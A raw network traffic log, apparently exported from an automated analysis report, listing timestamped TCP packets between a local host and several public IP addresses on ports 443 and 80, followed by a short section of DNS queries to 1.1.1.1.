                                                            Jan 15, 2025 17:02:07.857192993 CET4434973535.190.80.1192.168.2.16
                                                            Jan 15, 2025 17:02:07.857260942 CET49735443192.168.2.1635.190.80.1
                                                            Jan 15, 2025 17:02:07.857522964 CET49735443192.168.2.1635.190.80.1
                                                            Jan 15, 2025 17:02:07.857541084 CET4434973535.190.80.1192.168.2.16
                                                            Jan 15, 2025 17:02:08.065867901 CET44349734104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:08.066395998 CET49734443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:08.066420078 CET44349734104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:08.066998005 CET44349734104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:08.067410946 CET49734443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:08.067500114 CET44349734104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:08.067567110 CET49734443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:08.112782001 CET49734443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:08.112811089 CET44349734104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:08.141190052 CET49736443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:08.141233921 CET44349736104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:08.141417980 CET49736443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:08.141701937 CET49736443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:08.141721010 CET44349736104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:08.195539951 CET44349734104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:08.195630074 CET44349734104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:08.195753098 CET49734443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:08.196196079 CET49734443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:08.196218014 CET44349734104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:08.332130909 CET4434973535.190.80.1192.168.2.16
                                                            Jan 15, 2025 17:02:08.332437038 CET49735443192.168.2.1635.190.80.1
                                                            Jan 15, 2025 17:02:08.332468987 CET4434973535.190.80.1192.168.2.16
                                                            Jan 15, 2025 17:02:08.332808018 CET4434973535.190.80.1192.168.2.16
                                                            Jan 15, 2025 17:02:08.333117008 CET49735443192.168.2.1635.190.80.1
                                                            Jan 15, 2025 17:02:08.333177090 CET4434973535.190.80.1192.168.2.16
                                                            Jan 15, 2025 17:02:08.333235025 CET49735443192.168.2.1635.190.80.1
                                                            Jan 15, 2025 17:02:08.375339985 CET4434973535.190.80.1192.168.2.16
                                                            Jan 15, 2025 17:02:08.465049028 CET4434973535.190.80.1192.168.2.16
                                                            Jan 15, 2025 17:02:08.465135098 CET4434973535.190.80.1192.168.2.16
                                                            Jan 15, 2025 17:02:08.465219975 CET49735443192.168.2.1635.190.80.1
                                                            Jan 15, 2025 17:02:08.465421915 CET49735443192.168.2.1635.190.80.1
                                                            Jan 15, 2025 17:02:08.465447903 CET4434973535.190.80.1192.168.2.16
                                                            Jan 15, 2025 17:02:08.479371071 CET4968080192.168.2.16192.229.211.108
                                                            Jan 15, 2025 17:02:08.526793003 CET49678443192.168.2.1620.189.173.10
                                                            Jan 15, 2025 17:02:08.611015081 CET44349736104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:08.611310005 CET49736443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:08.611345053 CET44349736104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:08.611804962 CET44349736104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:08.612103939 CET49736443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:08.612200022 CET44349736104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:08.612229109 CET49736443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:08.654776096 CET49736443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:08.654803038 CET44349736104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:08.765608072 CET44349736104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:08.765706062 CET44349736104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:08.765840054 CET49736443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:08.766315937 CET49736443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:08.766340971 CET44349736104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:08.769989967 CET49737443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:08.770045042 CET44349737104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:08.770118952 CET49737443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:08.770407915 CET49737443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:08.770422935 CET44349737104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:08.782896042 CET4968080192.168.2.16192.229.211.108
                                                            Jan 15, 2025 17:02:09.031769037 CET49738443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:09.031821966 CET44349738104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:09.031915903 CET49738443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:09.032185078 CET49738443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:09.032197952 CET44349738104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:09.231554985 CET44349737104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:09.231842995 CET49737443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:09.231894016 CET44349737104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:09.232198954 CET44349737104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:09.232491016 CET49737443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:09.232561111 CET44349737104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:09.232614040 CET49737443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:09.275340080 CET44349737104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:09.276864052 CET49737443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:09.378359079 CET44349737104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:09.378427982 CET44349737104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:09.378509045 CET49737443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:09.379172087 CET49737443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:09.379219055 CET44349737104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:09.387804031 CET4968080192.168.2.16192.229.211.108
                                                            Jan 15, 2025 17:02:09.493079901 CET44349738104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:09.493432045 CET49738443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:09.493465900 CET44349738104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:09.493927956 CET44349738104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:09.494218111 CET49738443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:09.494302988 CET44349738104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:09.494363070 CET49738443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:09.535331964 CET44349738104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:09.613620043 CET44349738104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:09.613823891 CET44349738104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:09.613895893 CET49738443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:09.613922119 CET44349738104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:09.613985062 CET44349738104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:09.614038944 CET49738443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:09.614901066 CET49738443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:09.614918947 CET44349738104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:09.650341988 CET49740443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:09.650443077 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:09.650532961 CET49740443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:09.650780916 CET49740443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:09.650821924 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.150007010 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.151834965 CET49740443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:10.151897907 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.152277946 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.152928114 CET49740443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:10.152997971 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.153136015 CET49740443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:10.153227091 CET49740443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:10.153314114 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.153413057 CET49740443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:10.153466940 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.409663916 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.409708977 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.409775019 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.409774065 CET49740443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:10.409804106 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.409837008 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.409856081 CET49740443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:10.409861088 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.409871101 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.409903049 CET49740443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:10.410156965 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.410193920 CET49740443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:10.410198927 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.410681009 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.410705090 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.410727024 CET49740443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:10.410733938 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.410777092 CET49740443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:10.414398909 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.469814062 CET49740443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:10.513652086 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.513698101 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.513719082 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.513742924 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.513868093 CET49740443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:10.513868093 CET49740443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:10.513904095 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.513941050 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.513969898 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.513984919 CET49740443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:10.513994932 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.514053106 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.514062881 CET49740443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:10.514102936 CET49740443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:10.514233112 CET49740443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:10.514262915 CET44349740104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.517118931 CET49741443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:10.517189980 CET44349741104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.517258883 CET49741443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:10.517498970 CET49741443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:10.517530918 CET44349741104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.592803001 CET4968080192.168.2.16192.229.211.108
                                                            Jan 15, 2025 17:02:10.979300022 CET44349741104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.979595900 CET49741443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:10.979660034 CET44349741104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.980146885 CET44349741104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.980514050 CET49741443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:10.980628014 CET44349741104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:10.980650902 CET49741443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:11.020788908 CET49741443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:11.020821095 CET44349741104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:11.124325991 CET44349741104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:11.124438047 CET44349741104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:11.124505043 CET49741443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:11.124908924 CET49741443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:11.124931097 CET44349741104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:13.006794930 CET4968080192.168.2.16192.229.211.108
                                                            Jan 15, 2025 17:02:13.341921091 CET49678443192.168.2.1620.189.173.10
                                                            Jan 15, 2025 17:02:13.605532885 CET49742443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:13.605595112 CET44349742104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:13.605978966 CET49742443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:13.606194019 CET49742443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:13.606215000 CET44349742104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:14.068454027 CET44349742104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:14.068734884 CET49742443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:14.068772078 CET44349742104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:14.069067001 CET44349742104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:14.069360018 CET49742443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:14.069418907 CET44349742104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:14.069494963 CET49742443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:14.069566011 CET49742443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:14.069587946 CET44349742104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:14.069969893 CET49742443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:14.069988012 CET44349742104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:14.325336933 CET44349742104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:14.325416088 CET44349742104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:14.325453997 CET44349742104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:14.325483084 CET44349742104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:14.325493097 CET49742443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:14.325519085 CET44349742104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:14.325563908 CET44349742104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:14.325603008 CET49742443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:14.325628042 CET49742443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:14.325640917 CET44349742104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:14.325661898 CET44349742104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:14.325712919 CET49742443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:14.326442003 CET49742443192.168.2.16104.18.95.41
                                                            Jan 15, 2025 17:02:14.326472998 CET44349742104.18.95.41192.168.2.16
                                                            Jan 15, 2025 17:02:14.328859091 CET49743443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:14.328897953 CET44349743104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:14.329250097 CET49743443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:14.329451084 CET49743443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:14.329464912 CET44349743104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:14.411185026 CET49744443192.168.2.16104.21.48.1
                                                            Jan 15, 2025 17:02:14.411222935 CET44349744104.21.48.1192.168.2.16
                                                            Jan 15, 2025 17:02:14.411281109 CET49744443192.168.2.16104.21.48.1
                                                            Jan 15, 2025 17:02:14.411477089 CET49744443192.168.2.16104.21.48.1
                                                            Jan 15, 2025 17:02:14.411489010 CET44349744104.21.48.1192.168.2.16
                                                            Jan 15, 2025 17:02:14.804429054 CET44349743104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:14.804797888 CET49743443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:14.804821968 CET44349743104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:14.805278063 CET44349743104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:14.805644035 CET49743443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:14.805704117 CET44349743104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:14.805778980 CET49743443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:14.808815956 CET49673443192.168.2.16204.79.197.203
                                                            Jan 15, 2025 17:02:14.851335049 CET44349743104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:14.915731907 CET44349744104.21.48.1192.168.2.16
                                                            Jan 15, 2025 17:02:14.916124105 CET49744443192.168.2.16104.21.48.1
                                                            Jan 15, 2025 17:02:14.916167974 CET44349744104.21.48.1192.168.2.16
                                                            Jan 15, 2025 17:02:14.917017937 CET44349744104.21.48.1192.168.2.16
                                                            Jan 15, 2025 17:02:14.917103052 CET49744443192.168.2.16104.21.48.1
                                                            Jan 15, 2025 17:02:14.918206930 CET49744443192.168.2.16104.21.48.1
                                                            Jan 15, 2025 17:02:14.918265104 CET44349744104.21.48.1192.168.2.16
                                                            Jan 15, 2025 17:02:14.918366909 CET49744443192.168.2.16104.21.48.1
                                                            Jan 15, 2025 17:02:14.918381929 CET44349744104.21.48.1192.168.2.16
                                                            Jan 15, 2025 17:02:14.939290047 CET44349743104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:14.939376116 CET44349743104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:14.939455986 CET49743443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:14.939827919 CET49743443192.168.2.16104.18.94.41
                                                            Jan 15, 2025 17:02:14.939843893 CET44349743104.18.94.41192.168.2.16
                                                            Jan 15, 2025 17:02:14.967845917 CET49744443192.168.2.16104.21.48.1
                                                            Jan 15, 2025 17:02:15.521785975 CET44349744104.21.48.1192.168.2.16
                                                            Jan 15, 2025 17:02:15.521893024 CET44349744104.21.48.1192.168.2.16
                                                            Jan 15, 2025 17:02:15.521967888 CET49744443192.168.2.16104.21.48.1
                                                            Jan 15, 2025 17:02:15.523154974 CET49744443192.168.2.16104.21.48.1
                                                            Jan 15, 2025 17:02:15.523190975 CET44349744104.21.48.1192.168.2.16
                                                            Jan 15, 2025 17:02:15.627357960 CET49747443192.168.2.16104.21.112.1
                                                            Jan 15, 2025 17:02:15.627422094 CET44349747104.21.112.1192.168.2.16
                                                            Jan 15, 2025 17:02:15.627526045 CET49747443192.168.2.16104.21.112.1
                                                            Jan 15, 2025 17:02:15.627811909 CET49747443192.168.2.16104.21.112.1
                                                            Jan 15, 2025 17:02:15.627825975 CET44349747104.21.112.1192.168.2.16
                                                            Jan 15, 2025 17:02:15.780944109 CET44349725142.250.185.132192.168.2.16
                                                            Jan 15, 2025 17:02:15.781025887 CET44349725142.250.185.132192.168.2.16
                                                            Jan 15, 2025 17:02:15.781292915 CET49725443192.168.2.16142.250.185.132
                                                            Jan 15, 2025 17:02:16.083676100 CET44349747104.21.112.1192.168.2.16
                                                            Jan 15, 2025 17:02:16.084192038 CET49747443192.168.2.16104.21.112.1
                                                            Jan 15, 2025 17:02:16.084230900 CET44349747104.21.112.1192.168.2.16
                                                            Jan 15, 2025 17:02:16.085208893 CET44349747104.21.112.1192.168.2.16
                                                            Jan 15, 2025 17:02:16.085283995 CET49747443192.168.2.16104.21.112.1
                                                            Jan 15, 2025 17:02:16.085633993 CET49747443192.168.2.16104.21.112.1
                                                            Jan 15, 2025 17:02:16.085653067 CET49747443192.168.2.16104.21.112.1
                                                            Jan 15, 2025 17:02:16.085695982 CET44349747104.21.112.1192.168.2.16
                                                            Jan 15, 2025 17:02:16.085712910 CET49747443192.168.2.16104.21.112.1
                                                            Jan 15, 2025 17:02:16.085762024 CET49747443192.168.2.16104.21.112.1
                                                            Jan 15, 2025 17:02:16.086025000 CET49748443192.168.2.16104.21.112.1
                                                            Jan 15, 2025 17:02:16.086075068 CET44349748104.21.112.1192.168.2.16
                                                            Jan 15, 2025 17:02:16.086169004 CET49748443192.168.2.16104.21.112.1
                                                            Jan 15, 2025 17:02:16.086364985 CET49748443192.168.2.16104.21.112.1
                                                            Jan 15, 2025 17:02:16.086374044 CET44349748104.21.112.1192.168.2.16
                                                            Jan 15, 2025 17:02:16.551716089 CET44349748104.21.112.1192.168.2.16
                                                            Jan 15, 2025 17:02:16.551985025 CET49748443192.168.2.16104.21.112.1
                                                            Jan 15, 2025 17:02:16.552000046 CET44349748104.21.112.1192.168.2.16
                                                            Jan 15, 2025 17:02:16.553051949 CET44349748104.21.112.1192.168.2.16
                                                            Jan 15, 2025 17:02:16.553113937 CET49748443192.168.2.16104.21.112.1
                                                            Jan 15, 2025 17:02:16.553410053 CET49748443192.168.2.16104.21.112.1
                                                            Jan 15, 2025 17:02:16.553458929 CET44349748104.21.112.1192.168.2.16
                                                            Jan 15, 2025 17:02:16.553550005 CET49748443192.168.2.16104.21.112.1
                                                            Jan 15, 2025 17:02:16.553555012 CET44349748104.21.112.1192.168.2.16
                                                            Jan 15, 2025 17:02:16.562375069 CET49725443192.168.2.16142.250.185.132
                                                            Jan 15, 2025 17:02:16.562401056 CET44349725142.250.185.132192.168.2.16
                                                            Jan 15, 2025 17:02:16.606810093 CET49748443192.168.2.16104.21.112.1
                                                            Jan 15, 2025 17:02:17.131720066 CET44349748104.21.112.1192.168.2.16
                                                            Jan 15, 2025 17:02:17.131830931 CET44349748104.21.112.1192.168.2.16
                                                            Jan 15, 2025 17:02:17.131918907 CET49748443192.168.2.16104.21.112.1
                                                            Jan 15, 2025 17:02:17.132710934 CET49748443192.168.2.16104.21.112.1
                                                            Jan 15, 2025 17:02:17.132725000 CET44349748104.21.112.1192.168.2.16
                                                            Jan 15, 2025 17:02:17.150873899 CET44349713104.17.112.233192.168.2.16
                                                            Jan 15, 2025 17:02:17.150958061 CET44349713104.17.112.233192.168.2.16
                                                            Jan 15, 2025 17:02:17.151019096 CET49713443192.168.2.16104.17.112.233
                                                            Jan 15, 2025 17:02:17.293292046 CET49713443192.168.2.16104.17.112.233
                                                            Jan 15, 2025 17:02:17.293323994 CET44349713104.17.112.233192.168.2.16
                                                            Jan 15, 2025 17:02:17.808840990 CET4968080192.168.2.16192.229.211.108
                                                            Jan 15, 2025 17:02:22.950874090 CET49678443192.168.2.1620.189.173.10
                                                            Jan 15, 2025 17:02:27.416932106 CET4968080192.168.2.16192.229.211.108
                                                            Jan 15, 2025 17:02:47.116137981 CET4969780192.168.2.162.22.50.131
                                                            Jan 15, 2025 17:02:47.116209030 CET4969880192.168.2.162.22.50.131
                                                            Jan 15, 2025 17:02:47.121541023 CET80496972.22.50.131192.168.2.16
                                                            Jan 15, 2025 17:02:47.121669054 CET4969780192.168.2.162.22.50.131
                                                            Jan 15, 2025 17:02:47.121905088 CET80496982.22.50.131192.168.2.16
                                                            Jan 15, 2025 17:02:47.122003078 CET4969880192.168.2.162.22.50.131
                                                            Jan 15, 2025 17:03:05.263091087 CET49790443192.168.2.16216.58.206.36
                                                            Jan 15, 2025 17:03:05.263120890 CET44349790216.58.206.36192.168.2.16
                                                            Jan 15, 2025 17:03:05.263206005 CET49790443192.168.2.16216.58.206.36
                                                            Jan 15, 2025 17:03:05.263473988 CET49790443192.168.2.16216.58.206.36
                                                            Jan 15, 2025 17:03:05.263489008 CET44349790216.58.206.36192.168.2.16
                                                            Jan 15, 2025 17:03:05.920341969 CET44349790216.58.206.36192.168.2.16
                                                            Jan 15, 2025 17:03:05.920634031 CET49790443192.168.2.16216.58.206.36
                                                            Jan 15, 2025 17:03:05.920655012 CET44349790216.58.206.36192.168.2.16
                                                            Jan 15, 2025 17:03:05.921117067 CET44349790216.58.206.36192.168.2.16
                                                            Jan 15, 2025 17:03:05.921621084 CET49790443192.168.2.16216.58.206.36
                                                            Jan 15, 2025 17:03:05.921708107 CET44349790216.58.206.36192.168.2.16
                                                            Jan 15, 2025 17:03:05.970958948 CET49790443192.168.2.16216.58.206.36
                                                            Jan 15, 2025 17:03:15.837327003 CET44349790216.58.206.36192.168.2.16
                                                            Jan 15, 2025 17:03:15.837409973 CET44349790216.58.206.36192.168.2.16
                                                            Jan 15, 2025 17:03:15.837465048 CET49790443192.168.2.16216.58.206.36
                                                            Jan 15, 2025 17:03:16.641352892 CET49790443192.168.2.16216.58.206.36
                                                            Jan 15, 2025 17:03:16.641380072 CET44349790216.58.206.36192.168.2.16
                                                            Jan 15, 2025 17:03:37.738192081 CET4970080192.168.2.162.23.77.188
                                                            Jan 15, 2025 17:03:37.738266945 CET49699443192.168.2.1640.126.32.138
                                                            Jan 15, 2025 17:03:37.743345976 CET80497002.23.77.188192.168.2.16
                                                            Jan 15, 2025 17:03:37.743429899 CET4970080192.168.2.162.23.77.188
                                                            Jan 15, 2025 17:03:37.743510008 CET4434969940.126.32.138192.168.2.16
                                                            Jan 15, 2025 17:03:37.743565083 CET49699443192.168.2.1640.126.32.138
                                                            Jan 15, 2025 17:03:39.976224899 CET49701443192.168.2.1640.126.32.138
                                                            Jan 15, 2025 17:03:39.981658936 CET4434970140.126.32.138192.168.2.16
                                                            Jan 15, 2025 17:03:39.981750011 CET49701443192.168.2.1640.126.32.138
                                                            Jan 15, 2025 17:04:05.316123009 CET49797443192.168.2.16216.58.206.36
                                                            Jan 15, 2025 17:04:05.316169024 CET44349797216.58.206.36192.168.2.16
                                                            Jan 15, 2025 17:04:05.316320896 CET49797443192.168.2.16216.58.206.36
                                                            Jan 15, 2025 17:04:05.316597939 CET49797443192.168.2.16216.58.206.36
                                                            Jan 15, 2025 17:04:05.316626072 CET44349797216.58.206.36192.168.2.16
                                                            Jan 15, 2025 17:04:05.966994047 CET44349797216.58.206.36192.168.2.16
                                                            Jan 15, 2025 17:04:06.019100904 CET49797443192.168.2.16216.58.206.36
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jan 15, 2025 17:02:00.432159901 CET53609491.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:00.532640934 CET53629101.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:01.275017023 CET5000353192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:01.275299072 CET4938653192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:01.281877041 CET53500031.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:01.284106016 CET53493861.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:01.615462065 CET53499111.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:02.370767117 CET5028253192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:02.370918989 CET5883153192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:02.421474934 CET53502821.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:02.471623898 CET53588311.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:03.464787960 CET5452753192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:03.464988947 CET5822353192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:03.465920925 CET5594953192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:03.466073036 CET5240353192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:03.466342926 CET4998853192.168.2.161.1.1.1
